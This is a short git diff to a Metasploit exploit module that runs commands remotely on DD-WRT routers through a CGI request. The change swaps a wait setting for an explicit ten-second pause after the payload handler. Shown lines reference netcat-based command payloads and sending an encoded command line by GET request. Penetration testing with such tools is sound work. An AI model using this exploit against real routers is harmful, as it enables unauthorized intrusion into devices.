diff --git a/modules/exploits/linux/http/ddwrt_cgibin_exec.rb b/modules/exploits/linux/http/ddwrt_cgibin_exec.rb index ae78b19032..30a152d863 100644 --- a/modules/exploits/linux/http/ddwrt_cgibin_exec.rb +++ b/modules/exploits/linux/http/ddwrt_cgibin_exec.rb @@ -43,7 +43,6 @@ class Metasploit3 < Msf::Exploit::Remote { 'Space' => 1024, 'DisableNops' => true, - 'WfsDelay' => 20, 'Compat' => { 'RequiredCmd' => 'generic netcat-e' @@ -74,7 +73,12 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Sending GET request with encoded command line...") sock.put(req) + + print_status("Giving the handler time to run...") handler + + select(nil, nil, nil, 10.0) + disconnect end